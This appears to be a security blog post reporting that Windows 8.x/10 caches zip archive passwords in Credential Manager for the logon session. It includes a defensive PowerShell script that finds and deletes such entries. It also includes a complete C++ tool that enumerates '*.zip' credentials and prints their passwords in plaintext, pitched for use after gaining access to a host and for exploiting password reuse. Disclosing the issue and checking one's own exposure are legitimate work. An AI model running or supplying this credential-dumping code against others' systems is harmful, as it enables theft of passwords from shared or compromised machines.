Credential Manager – Zip Passwords Caching [Win8.x/10]

tl;dr: When you open a password-protected zip archive from Windows Explorer (“Extract All…”) on Windows 8.x/10, the password is automatically cached in Credential Manager for the life of the logon session.

Long story…short

This doesn’t apply to earlier Windows versions (tested on Win 7), at least not by default; it is apparently a ‘feature’ meant to favor usability over everything else.

Ok, let me rephrase that…“if you have once opened a protected zip archive using Windows Explorer, then what the hell…, let me cache that password for you so you don’t need to enter it again during that logon session”. Holy crap!!!

If you share the same account on a Windows host running one of those OS versions and you open password-protected zip archives with (…ahem) sensitive data using Windows Explorer, then rest assured that, if you don’t log off, anyone who is aware of this issue can easily get those passwords. So, you are basically fucked!

If you are an ethical hacker and you have just gained access to a host running Windows 8.x/10, then you might get really lucky, since people love re-using the same password for different things.
So, they are basically fucked!
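If you are on the defending side of this, the quick check is to look at your own logon session for cached credentials whose target ends in .zip and wipe them (or simply log off, which is what clears session-persisted entries). The PowerShell below is an added example written for this post, not kyREcon’s tool or anything that ships with Windows; it relies on the built-in cmdkey.exe and assumes that cmdkey /list prints each entry on a line of the form “Target: <type>:target=<name>”, which is the format I am used to seeing but have labelled as an assumption in the comments. It only sees the credential set of the user running it, so run it in the session you suspect.

```powershell
# Added example (not from the original post): list, and optionally remove,
# Credential Manager entries whose target ends in .zip, via cmdkey.exe.
# Assumption: each entry in "cmdkey /list" output has a line like
#   Target: LegacyGeneric:target=<name>
# The optional "<type>:target=" prefix is stripped so the bare name can be
# handed back to "cmdkey /delete:<name>".
param([switch]$Remove)

function Get-CachedZipCredentialTarget {
    foreach ($line in (cmdkey /list)) {
        # -match is case-insensitive by default, so .ZIP is caught as well
        if ($line -match '^\s*Target:\s*(?:[^:]+:target=)?(.+\.zip)\s*$') {
            $Matches[1]
        }
    }
}

$targets = @(Get-CachedZipCredentialTarget)

if ($targets.Count -eq 0) {
    Write-Host 'No cached .zip credentials in this logon session.'
    return
}

foreach ($t in $targets) {
    Write-Host "Cached zip credential target: $t"
}

if ($Remove) {
    foreach ($t in $targets) {
        # Quote the whole argument: target names may contain spaces.
        cmdkey "/delete:$t" | Out-Null
        Write-Host "Removed: $t"
    }
} else {
    Write-Host 'Re-run with -Remove to delete them (or just log off).'
}
```

Note that cmdkey never shows the stored secret; pulling the actual password out needs the CredEnumerate/CredRead route the C++ tool below takes. This script is for finding out whether you are exposed and cleaning up.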

w00t!

The code to do this is ridiculously simple as well…

#include <Windows.h>
#include <wincred.h>
#include <iostream>
#include <string>

#pragma comment(lib, "Advapi32.lib")   // CredEnumerateW / CredFree live here

using namespace std;

/*
Credential Manager – Zip archives password retrieval for Win 8.x – Win 10
Author: kyREcon
*/

// Human-readable name for CREDENTIALW::Persist. Session-persisted entries
// disappear at logoff, which is exactly the behaviour described above.
static const wchar_t *PersistName(DWORD persist)
{
    switch (persist)
    {
    case CRED_PERSIST_SESSION:       return L"session";
    case CRED_PERSIST_LOCAL_MACHINE: return L"local machine";
    case CRED_PERSIST_ENTERPRISE:    return L"enterprise";
    default:                         return L"unknown";
    }
}

int main()
{
    PCREDENTIALW *credBuf = NULL;
    DWORD count = 0;

    // Enumerate the current user's credential set, keeping only the targets
    // that match the filter used for cached zip archive passwords.
    if (!CredEnumerateW(L"*.zip", 0, &count, &credBuf))
    {
        // GetLastError() is only meaningful after the call has failed.
        DWORD err = GetLastError();
        if (err == ERROR_NOT_FOUND)
            wcout << endl << L"No credentials found in the user's credential set." << endl;
        else
            wcout << endl << L"CredEnumerateW failed, error " << err << endl;
        goto __cleanup;
    }

    for (DWORD i = 0; i < count; i++)
    {
        PCREDENTIALW cred = credBuf[i];
        if (!cred->CredentialBlob || !cred->TargetName)
            continue;

        // CredentialBlob is a raw byte buffer and is not guaranteed to be
        // NUL-terminated: bound it by CredentialBlobSize instead of trusting
        // a terminator, then drop any trailing NULs the writer did include.
        wstring password(reinterpret_cast<const wchar_t *>(cred->CredentialBlob),
                         cred->CredentialBlobSize / sizeof(wchar_t));
        while (!password.empty() && password.back() == L'\0')
            password.pop_back();

        wcout << endl << L"------------------------------------------------------" << endl;
        wcout << L"Target:   " << cred->TargetName << endl;
        wcout << L"Persist:  " << PersistName(cred->Persist) << endl << endl;
        wcout << L"Password: " << password << endl;
        wcout << L"------------------------------------------------------" << endl << endl;
    }

__cleanup:
    if (credBuf)
    {
        CredFree(credBuf);   // one call frees the whole array CredEnumerateW returned
        credBuf = NULL;
    }

    cin.get();
    return 0;
}

Note: You can easily modify the source code to search for more stuff, but that’s out of scope for this article, and there are probably other tools that can get that extra stuff for you.
If you are aware of another tool that gathers cached zip passwords on Win 8.x/10, then let me know. In any case, nothing really fancy here, but you might find it occasionally useful.  ;0)

The above was tested in Windows 8.1 and 10, but it probably applies to Win 8 as well…

Download Tool & Source

Cheers,
kyREcon
